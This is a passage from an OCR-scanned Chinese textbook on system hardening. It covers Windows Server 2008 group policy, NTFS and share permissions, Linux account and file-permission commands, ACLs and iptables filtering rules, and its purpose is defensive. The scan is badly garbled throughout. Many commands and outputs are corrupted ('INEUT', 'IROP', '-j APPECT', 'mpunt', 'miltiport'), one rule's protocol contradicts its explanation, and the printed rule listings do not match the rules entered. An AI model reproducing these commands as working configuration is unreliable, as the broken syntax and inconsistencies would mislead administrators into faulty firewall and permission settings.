中 ,我 们 只 要 及 时 查看 服务 器 系统 的 相关 日 志文 件 , 就 能 知道 重要 文件 夹 以 及 其 他 一 些 对 
象 是 否 遭 受过 非法 访问 或 攻击 ,一 旦 发 现 系统 存在 安全 隐患 ,我 们 就 可 以 根据 日 志文 件 中 
的 内 容 及 时 采取 针对 性 措施 进行 安全 防范 。 

3. 禁止 改变 本 地 安全 访问 级 别 

在 办 公 室 中 ,有 时 需要 与 他 人 共享 使 用 同一 台 计算 机 , 当 我 们 对 本 地 计算 机 的 IE 浏 
览 器 安全 访问 级 别 设置 完成 ,肯定 不 希望 他 人 随意 更 改 它 的 安全 访问 级 别 , 安 全 级 别 要 是 
设置 得 太 低 , 会 导致 潜藏 在 网 络 中 的 各 种 病毒 或 木马 对 本 地 计算 机 进行 恶意 攻击 ,从 而 可 
能 造成 本 地 系统 运行 缓慢 或 者 无 法 正常 运行 的 故障 现象 发 生 。 为 了 防止 其 他 人 随意 更 改 
本 地 计算 机 的 安全 访问 级 别 , Windows Server 2008 系统 允许 我 们 进行 如 下 设置 ,来 保护 
本 地 系统 的 安全 。 

首先 以 特权 账号 进入 Windows Server 2008 系统 环境 ,依次 单 击 系统 桌面 中 的 “ 开 
始 ” 一 “运行 ”选项 ,在 系统 运行 框 中 执行 gpedit. msc 命令 ,打开 本 地 计算 机 的 组 策略 编辑 
窗口 。 

其 次 在 组 策略 编辑 窗口 左 侧 区 域 展 开 * 用 户 配置 ”分支 ,再 依次 选择 该 分 支 下 面 的 “ 管 
理 模板 ”>“Windows 组 件 ? 一 Internet Explorer— "Internet 控制 面板 选项。 在 对 应 的 
"Internet 控制 模板 ”选项 右 侧 显示 区 域 中 找到 “禁用 安全 页 "目标 组 策略 项 目 , 并 用 鼠标 
右 击 该 项 目 ,执行 右键 菜单 中 的 “属性 ?命令 ,打开 目标 组 策略 项 目的 属性 设置 窗口 ,如 
图 4.28 所 示 。 
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选中 该 属性 设置 窗口 中 的 “已 启用 ”选项 ,再 单 击 “ 确 定 ” 按 钮 结束 目标 组 策略 属性 设 
置 操作 。 这 样 Internet Explorer 的 安全 设置 页 面 就 会 被 自动 隐藏 起 来 ,其 他 人 就 无 法 进 
入 该 安全 标签 设置 页 面 来 随意 更 改 本 地 系统 的 安全 访问 级 别 ,那么 本 地 计算 机 系统 的 安 
全 性 也 就 能 得 到 有 效 保证 。 

当然 ,我 们 也 可 以 通过 隐藏 Internet Explorer 窗口 中 的 “Internet 选项 ”, 阻 止 其 他 计 
算 机 随意 进入 IE 浏览 器 的 选项 设置 界面 ,来 自 改 本 地 系统 的 安全 访问 级 别 以 及 其 他 上 网 
访问 参数 。 在 隐藏 Internet Explorer 窗口 中 的 “Internet 选项 ”时 ,可 以 按照 前 面 的 操作 
步骤 打开 Windows Server 2008 系统 的 组 策略 编辑 窗口 ,将 鼠标 定位 于 “用 户 配 置 "*>“ 管 
理 模 板 ”>“Windows ZH fF" Internet Explorer 习 “浏览 器 菜单 ”分 支 选 项 上 ,再 将 该 目标 
分 支 选 项 下 面 的 禁用 “Internet 选项 ?组 策略 的 属性 设置 窗口 打开 ,如 图 4. 29 所 示 。 然 后 
选中 其 中 的 “已 启用 ?选项 ,最 后 单 击 * 确 定 ” 按 钮 就 能 使 设置 生效 。 


禁用 安全 页 属性 HA “Internet A..." APAN RE 引 x| 


图 4.28 禁用 安全 页 图 4.29 Internet 选项 


4.2.4 实践 案例 4-4: Windows 权限 管理 


1. 设置 .查看 .更 改 或 删除 文件 和 文件 夹 权限 

(1) 打开 Windows 资源 管理 器 。 

(2) 右 击 某 文件 夹 , 单 击 “ 属 性 ”, 然 后 单 击 “安全 ”选项 卡 ,如 图 4. 30 所 示 。 

G) 执行 以 下 任 一 操作 。 

(D 要 为 没有 在 “组 或 用 户 名 称 ? 框 中 显示 的 组 或 用 户 设置 权 限 , 单 击 “ 添 加 ”, 键 和 人 系 
统 中 已 存在 的 用 户 名 ,例如 user01, 然 后 单 击 “ 确 定 ”, 如 图 4. 31 所 示 。 

© 要 更 改 或 删除 现 有 的 组 或 用 户 的 权限 , 单 击 该 组 或 用 户 的 名 称 进行 删除 ,如 图 4. 32 
所 示 。 

(4) 要 允许 或 拒绝 某 一 权限 ,请 在 “用 户 或 组 的 权限 ” 框 中 ,选中 “允许 ”或 “拒绝 ” 
复 框 。 
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Ra system 
Bü Administrators (WIN-LSNCZQJTQQ9\Admini strators) 
Bü Users (NIN-LENCZQTIQQ9 Users) 


选择 用 户 或 组 


图 4.30 “用 户 属性 ”对 话 框 图 4.31 “选择 用 户 或 组 ”对 话 框 


BAA HRE 


S srst 
MAdministrators (NIN-LENCZQJTQQ\Adnini strators) 


图 4. 32 “用 户 的 权限 ”对 话 框 


注意 以 下 几 点 : 

O@ 在 Windows Server 2008 家 族 中 Everyone 组 不 再 包括 Anonymous Logon; 

© 只 能 在 使 用 NTFS 格式 化 的 驱动 器 上 设置 文件 和 文件 夹 权 限 ; 

© 要 更 改 权 限 ,必须 是 所 有 者 或 已 被 所 有 者 授 了 执行 该 操作 权限 的 使 用 者 ; 

@ 无 论 保 护 文件 和 子 文件 夹 的 权限 是 高 是 低 ,获得 文件 夹 “ 完 全 控制 "权限 的 组 或 用 
户 都 可 以 删除 该 文件 夹 内 的 文件 和 子 文件 夹 ; 

© 如 果 “ 用 户 或 组 的 权限 ”下 的 复 选 框 为 灰色 ,或 者 "删除 ”按钮 不 可 用 , 则 文件 或 文 
件 夹 已 经 从 父 文件 夹 继承 权限 ; 


计算 机 信息 安全 实践 教程 


© 添加 新 用 户 或 新 组 时 ,默认 情况 下 ,该 用 户 或 组 将 具有 “ 读 取 和 运行 "…“ 列 出 文件 
夹 内 容 ” 和 *“ 读 取 ” 权 限 。 
2. 设置 查看 、 更 改 或 删除 特殊 权限 


(1) 要 配置 安全 性 以 便 文件 和 子 文件 夹 不 会 继承 这 些 权限 ,清除 “ 仅 将 这 些 权 限 应 用 
到 此 容器 中 的 对 象 和 /或 容器 " 复 选 项 ,如 图 4. 33 所 示 。 


BAA 的 权限 项 目 


图 4. 33 “用 户 的 权限 项 目 ” 对 话 框 


(2) 单 击 “ 确 定 ”, 然 后 在 “对象 名 的 高 级 安全 设置 "中 , 单 击 “ 确 定 ”。 如 果 选 中 “用 在 
此 显示 的 可 以 应 用 到 子 对 象 的 项 目 蔡 代 所 有 子 对 象 的 权限 项 目 ” 复 选项 ,所 有 文件 和 子 文 
件 夹 会 将 其 所 有 权限 项 重 设 为 从 父 对 象 继承 的 那些 项 。 单 击 “ 应 用 ”或 者 “确定 ”后 ,将 无 
法 通过 清除 复 选 框 撤消 该 操作 (如 图 4. 34 所 示 )。 


[T] 1 置 


4. 34 “用 户 的 高 级 安全 设置 "对 话 框 
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注意 以 下 几 点 : 

CD 如 果 选 中 * 人 允许 父 项 的 继承 权限 传播 到 该 对 象 和 所 有 子 对 象 ,包括 那些 在 此 明确 
定义 的 项 目 ” 复 选 框 ,那么 该 文件 或 文件 夹 将 从 父 对 象 继承 权限 ; 

O 要 更 改 权限 ,必须 是 所 有 者 或 已 被 所 有 者 授予 了 执行 该 操作 的 权限 的 使 用 者 ; 

C 无 论 保护 文件 和 子 文件 夹 的 权限 是 高 是 低 , 获 得 文件 夹 “ 完 全 控制 ”权限 的 组 或 用 
户 都 可 以 删除 该 文件 夹 内 的 文件 和 子 文件 夹 。 

3. 设置 共享 资源 的 权限 

(1) 打开 Windows 资源 管理 器 。 

(2) 右 击 要 设置 权限 的 共享 文件 夹 或 驱动 器 ,然后 单 击 “ 共 享 和 安全 ”。 

(3) 在 “共享 ”选项 卡 上 , 单 击 “ 权 限 ”, 进 行 以 下 任意 修改 ,然后 单 击 “ 确 定 ”。 

O 若 要 为 用 户 或 组 指派 共享 资源 的 权限 ,请 单 击 “ 添 加 ”。 在 “选择 用 户 、 计 算 机 或 
组 ”对 话 框 中 ,查找 或 键入 用 户 或 组 名 ,然后 单 击 “ 确 定 ”。 

© 若 要 撤销 对 共享 资源 的 访问 权限 ,请 单 击 “ 删 除 ”。 

© 若 要 为 用 户 或 组 设置 单独 权限 ,请 在 “组 或 用 户 ” 框 的 “权限 ”中 ,选择 “允许 "或 “ 拒 
绝 " 复 选 框 。 

注意 以 下 几 点 : 

(D 必须 以 Administrations, Service Operators 组 或 Power Users 组 成 员 的 身份 登录 
才 可 完成 此 过 程 ,如 果 计 算 机 与 网 络 连接 ,网 络 策略 设置 也 可 能 无 法 完成 此 过 程 ; 

@ 可 以 使 用 “共享 文件 夹 " 来 管理 本 地 和 远程 计算 机 上 的 共享 资源 ; 

© 如 果 同 时 在 共享 资源 和 文件 系统 级 别 上 指派 权限 ,通常 会 使 用 更 受 限制 的 权限 ; 

CD 通常 , 先 给 组 指派 权限 ,然后 往 组 中 添加 用 户 , 这 样 比 给 单个 用 户 指 派 相同 权限 更 
容易 一 些 ; 

C) 如 果 要 更 改 特殊 共享 资源 ,例如 ADMIN $ 的 权限 , 当 终 止 并 重新 启动 服务 器 服 
务 或 重新 启动 计算 机 时 ,将 恢复 默认 设置 ,这 种 情况 并 不 适用 于 那些 由 用 户 创建 的 共享 名 
以 $ 结 尾 的 共享 资源 ; 

© 如 果 启 用 简单 文件 共享 ,那么 文件 共享 选项 会 受到 限制 。 


4.3 Linux 系统 加 固 


4.3.1 实践 案例 4-5: Linux 账号 安全 管理 


操作 系统 账号 安全 是 实现 系统 安全 的 第 一 步 , 但 是 不 少 企业 的 系统 中 都 没有 对 操作 
系统 进行 有 针对 性 的 管理 ,如 直接 通过 root 账号 登录 、 密 码 长 期 不 进行 修改 以 及 密码 复 
杂 人 性 设置 得 低 等 ,这 些 都 是 十 分 危险 的 行为 。 其 中 最 常见 的 就 是 直接 通过 root 账号 进行 
系统 登录 ,由 于 root 账号 拥有 系统 所 有 操作 的 权限 ,因此 极 易 因 误 操 作 而 导致 系统 崩溃 。 
本 节 就 Linux 系统 账号 安全 技术 进行 详解 。 

1. 系统 账号 管理 基础 

1) 添加 用 户 账 号 

(1) 命令 : useradd [参数 ] 二 账号 名 二 。 
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(2) 参数 及 其 解释 。 

-u: 指定 用 户 的 UID 号 ,此 号 码 在 整个 系统 中 是 唯一 的 。 

-g: 指定 用 户 的 主 属 GID 号 。 

-G: 指定 用 户 的 附属 组 ,可 写 多 个 ,以 *,” 隔 开 。 

-M: 强制 不 建立 账号 的 home 目录 (每 个 账号 都 可 以 有 一 个 home 目录 ,用 于 保存 用 
户 自己 的 资料 ) 。 

-m: 强制 建立 账号 。 

-c: 指定 用 户 账号 的 描述 信息 。 

-d: 指定 home 目录 建立 的 位 置 (默认 情况 下 home 目录 建立 在 /home/ 志 账号 名 过) 。 

-s: 指定 用 户 登 录 所 使 用 的 Shell, 

2) 添加 组 账号 

(1) 命令 : groupadd [参数 ] <44>. 

(2) 参数 及 其 解释 。 

-g: 指定 组 的 GID 号 ,此 号 码 在 整个 系统 中 是 唯一 的 。 

3) 修改 用 户 账号 

Ad) 命令 : usermod [参数 ] 二 用 户 名 二 。 

(2) 参数 及 其 解释 。 

-c: 修改 用 户 账号 的 描述 信息 。 

-d: 修改 home 目录 建立 的 位 置 。 

-e: 指定 此 账号 的 到 期 时 间 ,到 期 后 要 求 用 户 对 密码 进行 修改 后 再 行使 用 。 

-g: 修改 用 户 的 主 属 GID 号 码 。 

-G: 修改 用 户 的 附属 组 ,可 写 多 个 ,以 *,"” 喜 号 隔 开 。 

-1: 修改 用 户 账号 的 用 户 名 。 

-s: 修改 用 户 登录 所 使 用 的 Shell。 

-u: 修改 用 户 的 UID 号 ,此 号 码 在 整个 系统 中 是 唯一 的 。 

-L: 暂时 锁定 此 用 户 账号 ,不 允许 其 进行 登录 (如 某 用 户 放假 或 出 差 时 可 进行 账号 
锁定 ) 。 

-U: 对 用 户 账 号 进行 解锁 。 

4) 修改 组 账号 

CD 命令 : groupmod [-g gid] [-n group name]. 

(2) 参数 及 其 解释 。 

-g: 修改 组 的 GID 号 ,此 号 码 在 整个 系统 中 是 唯一 的 。 

-n: 修改 组 账号 的 名 称 。 

5) 删除 用 户 账号 

(OD 命令 : userdel [-r] 二 用户 名 这 。 

(2) 参数 及 其 解释 。 

-r: 连同 用 户 的 home 目录 一 同 删除 。 
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6) 删除 组 账号 

命令 : groupdel 一 组 名 二 。 

7) 账号 及 密码 配置 文件 

/etc/passwd。 

用 户 账号 信息 配置 文件 ,每 个 账号 信息 占用 一 行 , 各 属性 以 ":” 隔 开 。 

如 ,root:x:0:0:root:/root:/bin/bash。 

说 明 , 用 户 名 :密码 :UID:GID: 账 号 描述 信息 :home 目录 :用 户 登 录 Shell。 

/etc/ shadow , 

用 户 账号 密码 配置 文件 ,每 个 账号 信息 占用 一 行 , 各 属性 以 ":” 隔 开 。 

如 ,root:$1$RZpotIp0$X/MBioTGMrnIEML3t. Pd01:14371:0:99999:7:::。 

说 明 ,用 户 名 :密码 :最 近 更 改 密码 日 期 :多 少 天 内 允许 修改 密码 :多 少 天 内 必须 修改 
密码 :必须 在 修改 密码 的 前 多 少 天 提醒 用 户 :超过 必须 修改 密码 的 多 少 天 后 账号 仍 有 效 : 
账号 失效 日 期 :保留 。 

/etc/group. 

组 账号 密码 配置 文件 ,每 个 账号 信息 占用 一 行 , 各 属性 以 ":“ 隔 开 。 

如 ,root:x:0:root。 

说 明 ,组 名 :组 密码 :GID: 组 用 户 列表 。 

2. 图 形 化 账号 管理 

对 于 账号 管理 ,Red Hat Enterprise Linux 提供 了 图 形 化 的 账号 管理 工具 ,使 得 系统 
管理 员 可 以 更 方便 直观 地 进行 账号 管理 ,如 图 4. 35 所 示 。 


File Edit Help 

3 ab g El 
Add User Add Group Properes Dele | Refresh Help 

searhmer[ | 

Users | Groups. 
UserName  UseriDv | Primary Group  FullName Login Shell — Home Directory 
wargli 500 wangi wargli linbash  /homejwangli 
strit 507 strit sbirynologin /home/strit 
userl 508 userl lin/bash ^ /homejuserl 
hany 509 harry imbash ^ /homejharry 
natasha 510 natasha fbinbash ^ /homelnatasha 
stri su stri /sbin/nologin /home/stit 
sammon 512 sammon bin/bash /home/sammon 
jack 513 jack bibash ^ /homejjack 
tom 514 tom lin/bash ^ /home/tom 
sunny 515 sunny fein/bash /home/sunny 
user 516 user2 hbin/bash /home/user2 
myquota 517 myquota /bin/bash /home/myquota 
myuser 518 myuser /hinbash /home/myuser 
manager — 519 manager bibash ^ /home/manager 


图 4.35 账号 管理 
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4.3.2 实践 案例 4-6: Linux 文件 系统 权限 安全 管理 


在 Red Hat Enterprise Linux 中 ,系统 账号 与 文件 系统 权限 密切 相关 ,由 此 实现 系统 
最 基础 的 安全 性 。 管 理 员 可 以 指定 各 个 文件 及 目录 ,只 允许 部 分 用 户 和 组 进行 访问 \ 修 改 
或 执行 指定 的 文件 和 目录 。 

1. Linux 文件 系统 权限 管理 基础 

通过 命令 ls -1 可 以 得 到 以 下 结果 。 

[root@ serverl ~ ]#1s -1 

[root@ serverl ~ ]#total 32 

[roote serverl ~ ]J#drwxr- xr- x 2 test test 4096 2009- 03- 14 10:41 Desktop 

[rcoté serverl ~ ]J#drwxr- xr- x 2 test test 8192 2009- 03- 14 11:25 tmp 


CD 每 个 文件 的 第 一 位 表明 了 此 文件 的 类 型 。 

d: 目录 文件 。 

-: 普通 文件 (不 是 目录 或 链接 ) 。 

1: 到 系统 中 其 他 程序 或 文件 的 符号 链接 。 

(2) Linux 文件 系统 权限 分 3 组 ,依次 是 文件 所 有 者 (u)、 同 组 用 户 (g) 和 其 余 用 
户 (o) 。 

TWX T-X I-X。 

文件 所 有 者 : 表示 用 户 为 此 文件 所 有 者 时 对 此 文件 拥有 何 种 操作 权限 。 

同 组 用 户 : 表示 用 户 所 属 组 与 此 文件 组 属性 相同 时 对 此 文件 拥有 何 种 操作 权限 。 

其 余 用 户 : 表示 其 他 用 户 账号 对 此 文件 有 何 种 操作 权限 。 

每 组 权限 分 为 3 位 ,r(read) 、w(write) 和 x(execute), 可 以 用 八进制 来 表示 ,rw、x 分 
别 是 4.2、1, 权 限 是 相 加 的 ,rwx 就 是 7,r-x 就 是 5。 

以 上 例子 中 两 个 目录 文件 的 权限 以 绝对 权限 表示 法 可 以 表示 为 755。 

(3) 对 普通 文件 权限 的 定义 。 

读 取 权限 (r) : 打开 文件 ,对 文件 进行 拷贝 的 权限 。 

写 人 权限 (w): 删除 ,修改 文件 的 权限 。 

执行 权限 (x) : 执行 文件 的 权限 。 

(4) 对 目录 文件 (文件 夹 ) 权 限 的 定义 。 

读 取 权 限 (r) : 以 列表 形式 列 出 文件 夹 中 文件 的 权限 。 

写 入 权限 (w): 删除 修改 文件 夹 的 权限 。 

执行 权限 (x): 进入 文件 夹 的 权限 。 

(5) 修改 文件 权限 。 

命令 : chmod 去 模式 > 一 文件 或 目录 名 二 。 

CD 八进制 模式 : 以 八进制 模式 直接 指定 文件 所 有 者 、 同 组 用 户 及 其 余 用 户 的 操作 
权限 。 

例如 : chmod 775 tmp. 
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结果 : drwxrwxr-x 2 test test 8192 2009-03-14 11:25 tmp。 

(2) 符号 模式 : u 代表 文件 所 有 者 ,g 代表 同 组 用 户 ,o 代表 其 余 用 户 ,a 代表 所 有 
3 种 类 型 ,可 以 通过 “十 "或 “一 ”来 表明 要 加 入 或 去 除 的 读 (r) 、 写 (w) 或 执行 (x) 权 限 。 

例如 : chmod a-w tmp. 

结果 : dr-xr-xr-x 2 test test 8192 2009-03-14 11:25 tmp. 

2. SUID/SGID 特殊 权限 管理 

除了 普通 的 文件 权限 以 外 ,Linux 系统 还 扩展 了 SUID、SGID 及 Sticky Bit 这 3 种 特 
殊 权限 , 表 4. 1 列 出 了 这 3 组 特殊 权限 的 有 效 范围 及 功能 。 

表 4.1 SUID .SGID X Sticky Bit 的 有 效 范围 及 功能 


SUID( 八 进 制 表示 : 4) SGID( 八 进 制 表 示 : 2) Stickey Bit( 八 进 制 表示 : 1) 
; 执行 时 以 文件 所 有 者 权限 | 执行 时 以 文件 所 属 用 户 权限 
普通 文件 | 执行 aT 
目录 文件 = 在 此 目录 下 新 建 的 所 有 文件 DOE E 
继承 此 目录 的 同 组 目录 权限 | TE 


修改 文件 的 SUID、SGID 及 Sticky Bit 权限 。 

例如 : chmod 2755 tmp. 

结果 : drwxr-sr-x 2 test test 8192 2009-03-14 11:25 tmp. 

此 权限 设置 后 ,所 有 在 tmp 目录 下 新 建 的 文件 或 目录 ,其 工作 组 均 会 自动 继承 父 目 
录 工 作 组 , 即 test 工作 组 。 

3. 文件 系统 ACL 高 级 权限 控制 

对 于 基础 的 文件 权限 ,系统 只 能 对 对 应 用 户 或 单个 组 设置 其 操作 权限 。 假 设 当前 企 
业 有 以 下 环境 要 求 : 销售 部 (sale) 有 一 个 项 目 要 与 技术 部 (tech) 中 的 一 位 同事 (ken) 共 
部 ,但 又 不 希望 ken 拥有 对 销售 部 其 他 文件 的 任何 操作 权限 。 对 此 ,上 面 提 到 的 文件 权限 
设置 都 无 法 完成 ,解决 此 问题 需要 借助 文件 系统 的 ACL 权限 控制 。 

1) 配置 文件 系统 ACL 支持 

[root@ serverl ~ ]#mpunt -o acl /hare 

[root serverl ~ ]ivim /etc/fstab 

/dev/NolGroupO0/LogVo103 /home ext3 defaults,acl 0 0 

2) 获取 文件 的 ACL 权限 状态 


[rooté serverl ~ ]#getfacl sale file.cfg 
file: sale file.cfg 
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3) 修改 文件 的 ACL 权限 


[root®@ rh442 ~ ]#setfacl -m u:test:rx sale file.cfg 
[root  rh442 ~ ]#getfacl sale file.cfg 
file: sale file.cfg 


owner: tam 


如 此 设置 后 ,用 户 ken 可 以 对 文件 sale file. cfg 进行 读 操作 及 执行 操作 ,同时 ken 不 
用 加 入 到 sale 组 中 ,因此 ken 不 能 对 sale 组 的 其 他 文件 进行 操作 。 

4) 文件 系统 ACL 常用 操作 

命令 : setfacl [-R] 二 -ml-M|-x|-X ACL 权限 二 二 文件 名 二 。 

-m. —modify- acl 设置 ACL 权限 。 

-M, —modify-file— file 参考 file 的 ACL 权限 来 设置 目标 的 ACL 权限 。 

-x. —remove- acl 删除 ACL 权限 。 

-X. —remove-file— file 参考 file 的 ACL 权限 来 删除 目标 的 ACL 权限 。 

-R, 一 recursive 递归 修改 本 目录 及 其 所 有 子 目 录 中 的 所 有 ACL 权限 (只 对 目录 
有 效 ) 。 

ACL 权限 格式 : [di ]-—ul glo: — HEP 4 i BUB 

如 ,ul:test:rx, 表 示 为 test 用 户 添 加 读 操 作 及 执行 操作 权限 。 

在 ACL 权限 格式 中 ,最 前 面 的 “d:” 只 对 目录 有 效 ,表示 默认 情况 下 此 目录 下 的 所 有 
文件 都 继承 当前 的 ACL 权限 。 


4.3.3 实践 案例 4-7: Linux 网 络 安全 管理 


从 Linux Kernel 2. 4 开始 ,新 的 网 络 包 过 滤 框 架 Netfilter/Iptables 替代 了 原来 的 
Ipchains/Ipfwadm 系统 ,成 为 Linux 系统 新 一 代 的 内 核 级 防火 墙 。 作 为 内 核 网 络 协议 的 
一 个 扩展 集 ,Netfilter 可 以 在 内 核 内 部 高 效 地 进行 包 过 滤 、 网 络 地 址 转换 (NAT) 和 包 重 
组 。 对 于 网 络 安全 防护 来 讲 , 主 要 用 到 的 是 Netfilter 的 包 过 滤 功 能 .本 节 也 将 就 这 一 主 
题 展开 描述 。 

1. Linux 内 核 防火 墙 的 包 过 滤 机 制 

通过 包 过 滤 机 制 ,Netfilter 可 以 按 要 求 禁止 网 络 包 对 本 地 服务 器 的 访问 及 本 地 对 外 
的 访问 ,或 者 对 经 过 本 地 转发 的 信息 包 进行 过 滤 以 保护 系统 ,防止 未 经 允许 的 网 络 访问 本 
地 服务 。 

Netfilter/Iptables 防火 墙 的 包 过 滤 机 制 中 实现 对 以 下 三 类 访问 方式 的 过 滤 ， 
Netfilter/Iptables 中 称 它们 为 过 滤 链 (Chain) 。 
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INPUT £t: 用 于 过 滤 来 自 外 部 系统 且 目 的 地 为 本 机 的 信息 包 。 例 如 ,服务 器 中 通过 
Apache Httpd 来 实现 Web 网 站 服务 器 , 当 外 部 系统 尝试 访问 本 地 Httpd 所 在 的 端口 80 
时 ,会 触发 INPUT 链 中 的 规则 。 

OUTPUT 链 : 用 于 过 滤 从 系统 内 部 发 出 的 对 外 访问 的 信息 包 。 例 如 ,本 地 用 户 对 外 
发 送 电子 邮件 时 ,要 求 通过 SMTP 协议 ,也 就 是 端口 25 来 向 外 部 邮件 服务 器 发 送信 息 ， 
此 时 就 会 触发 OUTPUT 链 中 的 规则 。 

FORWARD ££; 用 于 过 滤 要 求 进行 转发 的 信息 包 , 只 有 当 /proc/sys/net/ipv4/ip_ 
forward 为 “1” 时 才 有 效 , 也 就 是 只 对 路 由 功能 生效 。 例 如 ,禁止 某 个 TP 通过 本 机 路 由 访 
问 到 其 他 网 段 。 

由 于 Netfilter/Iptables 中 的 所 有 操作 都 通过 iptables 这 一 命令 来 实现 的 ,因此 业界 
当前 也 普遍 使 用 Iptables 作为 Netfilter 的 代名词 ,代表 Linux 中 的 防火 墙 机 制 。 

2. Iptables 端口 过 滤 实 例 (1) 

1) 清空 控制 规则 

操作 实例 如 下 。 

方法 1。 

[root serverl ~ ]#iptables -t filter -F 

[roote serverl ~ ]fiptables -t nat - F 

[root8 serverl ~ ]fiptables - t mangle - F 

方法 2。 

[root serverl ^ ]&/etc/init.d/iptables stop 

方法 1 的 操作 分 解 。 

-t filter; 对 过 滤 表 进行 操作 ,用 于 常规 的 网 络 地址 及 端口 过 滤 。 

-t nat; 对 网 络 地 址 转换 表 进 行 操作 ,用 于 网 络 连接 共享 .端口 映射 等 操作 。 

-t mangle: 对 mangel 表 进 行 操作 ,用 于 改变 包 的 TOS 等 特性 的 操作 。 

下 : 清空 列表 中 的 所 有 规则 。 

方法 1 的 全 句 解释 。 

通过 Iptables 命令 清空 filter、nat 及 mangle 表 中 的 规则 ,也 就 是 清空 Iptables 中 的 
所 有 规则 。 

方法 2 的 全 句 解释 。 

在 Red Hat Enterprise Linux 中 可 以 通过 对 Iptables 服务 进行 stop 操作 来 达到 清空 
Iptables 规则 的 效果 ,但 是 这 并 不 会 真正 地 清除 规则 , 当 Iptables 应 用 启动 的 时 候 仍然 会 
读 取 /etc/sysconfig/iptables 文件 ,重新 载 人 已 记录 的 规则 。 

2) 基于 访问 源 的 控制 

操作 实例 如 下 。 


[root serverl ~ ]#iptables -t filter — A INFUT — s 192.168.101.202 - j DROP 


操作 分 解 。 


IS 
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-t filter; 使 用 过 滤 ( 表 ) 功 能 对 网 络 行为 进行 控制 处 理 。 

-A INPUT: 表示 对 INPUT 链 进行 规则 追加 操作 。 

-S 192. 168. 101. 202: 表示 针对 访问 来 源 IP 地 址 为 192. 168. 101. 202 的 信息 包 进行 
处 理 。 

-j DROP: 丢弃 (不 向 访问 来 源 返 回 任何 信息 ) 符 合 规则 的 信息 包 。 

全 句 解释 : 使 用 Iptables 在 过 滤 列 表 的 INPUT 链 中 追加 规则 ,一 旦 发 现 从 外 部 要 求 
访问 本 机 网 络 服务 且 源 IP 地 址 为 192. 168. 101. 202 的 信息 包 , 就 马上 将 其 丢弃 。 

3) 基于 访问 目标 的 控制 

操作 示例 如 下 。 

[root@ serverl ~ ]#iptables - A OUTPUT - d 192.168.101.250 -p tcp - - dport 80 

-j REJECT 

操作 分 解 。 

-t filter: 此 处 没有 使 用 -t filter, 但 同样 会 对 filter 进行 操作 ,因为 filter 是 Iptables 默 
认 操 作 的 链表 。 

-A OUTPUT: 表示 对 OUTPUT 链 进 行规 则 追加 操作 。 

-d 192. 168. 101. 250: 表示 针对 访问 目标 为 192. 168. 101. 250 的 信息 包 进 行 处 理 。 

-p tep -dport 80; 表示 针对 访问 目标 协议 为 TCP, 且 端口 为 80 的 信息 包 进 行 处 理 。 

-j REJECT: 拒绝 (向 访问 源 发 送 拒绝 请 求 信息 ) 符 合 规则 的 信息 包 。 

全 句 解释 。 

使 用 Iptables 在 过 滤 列 表 的 OUTPUT 链 中 追加 规则 ,一 旦 发 现 从 本 地 要 求 访问 外 
部 网 络 服务 且 访 问 协议 为 TCP 目标 IP 为 192.168.101.250、 端 口 为 80 的 信息 包 , 就 马上 
将 其 拒绝 。 

4) 同时 过 滤 多 个 端口 

操作 实例 如 下 。 

[root@ serverl ~ ]#iptables -A INPUT —i eth0 -p udp - - dport 137:139 - j REJECT 

[root@ serverl ~ ]fiptables -I INPUT 2 -i ethl - p udp - m miltiport - — dports 80,443 — j APPECT 

操作 分 解 。 

-ieth0: 表示 针对 从 etho 进入 的 信息 包 进 行 处 理 。 

-p udp 一 dport 137:139: 表示 针对 访问 目标 协议 为 UDP 且 端 口 为 137 一 139 的 信息 
包 进 行 处 理 。 

-I INPUT 2; f£ INPUT 链 的 第 2 行进 行规 则 插入 操作 。 

-p tcp -m multiport —dports 80.443; 表示 针对 访问 目标 协议 为 TCP 且 端 口 为 80 或 
443 的 信息 包 进 行 处 理 。 

-j APPECT: 允许 符合 规则 的 信息 包 通 过 。 

全 句 解释 。 

第 1 句 : 使 用 Iptables 在 过 滤 列 表 的 INPUT 链 中 追加 规则 ,一旦 发 现 通过 echo 网 
卡 接口 从 外 部 要 求 访 问 本 机 网 络 服务 且 访 问 协议 为 UDP、 目 标 访问 端口 为 137 一 139 的 
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信息 包 , 就 马上 将 其 拒绝 。 

第 2 句 : 使 用 Iptables 在 过 滤 列 表 的 INPUT 链 的 第 2 行 插入 规则 ,一 旦 发 现 通 
过 eth。 

3. Iptables 端口 过 滤 实 例 (2) 

1) 检查 当前 的 Iptables 规则 


[root@ serverl ~ ]#iptables -t filter -nL 

Chain INEUT (policy ACCEPT) 

target prot opt source destination 

DROP all - ~ 192.168.101.202 0.0.0.0/0 

AXEPT udp - - 0.0.0.0 0 0.0.0.0/0 multiport dports 80,443 

REJECT tcp - — 0.0.0.0 0 0.0.0.0/0 tcp dpts:137:139 

reject- with iam- Port 

unreachable 

Chain FORWARD (policy ACCEPT) 

target prot opt source destination 

Chain OUTEUT (policy ACCEPT) 

target prot opt source destination 

REJECT tcp - ~ 0.0.0.0/0 192.168.101.250 tcp dpt:80 

reject- with iamp- port- unreachable 

2) Iptables 默认 规则 

从 命令 iptables -t filter -nL 中 可 以 看 出 ,当前 在 filter X P. INPUT, OUTPUT, 
FORWARD 的 默认 规则 都 是 “policy ACCEPT”, 即 允许 通过 。 管 理 员 可 以 自 定义 各 个 链 
(Chain) 的 默认 规则 以 达到 系统 要 求 的 安全 性 。 

[root8 serverl ~ ]#iptables - P INPUT IROP 

[root8 serverl ~ ]fiptables - t filter -nL 

Chain INEUT (policy DROP) 

target prot opt source destination 

IROP all - - 192.168.101.202 0.0.0.0/0 

注意 ,通过 iptables -P 进行 默认 规则 设 定时 ,只 能 使 用 ACCEPT 2X DROP ,而 不 能 使 
用 REJECT。 

3) 保存 Iptables 规则 

通过 Iptables 命令 设 定 的 规则 只 会 保留 在 当前 的 内 存 中 ,一 旦 服务 器 重新 启动 ,这些 
规则 将 全 部 丢失 。 通 过 以 下 两 种 方法 可 以 使 系统 在 启动 时 重新 读 人 Iptables 规则 ,达到 
保存 Iptables 规则 的 目的 。 

方法 1 如 下 。 


[roote serverl ~ ]#/etc/init.d/iptables save 
Saving firewall rules to etc/sysconfig/iptables: [ CK ] 
[roote serverl ~ ]#cat /etc/sysconfig/iptables 

#Generated by iptables- save v1.3.5 cn Sat May 30 04:57:24 2009 
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* filter 
:INEUT DFOP [653:52961] 
:FORWARD ACCEPT [0:0] 
:OUTEUT ACCEPT [432:58700] 
-A INEUT - s 192.168.101.202 - j DROP 
-AINEUT -i ethl -p udp -mmiltiport - -dp orts 80,443 - j ACCEPT 
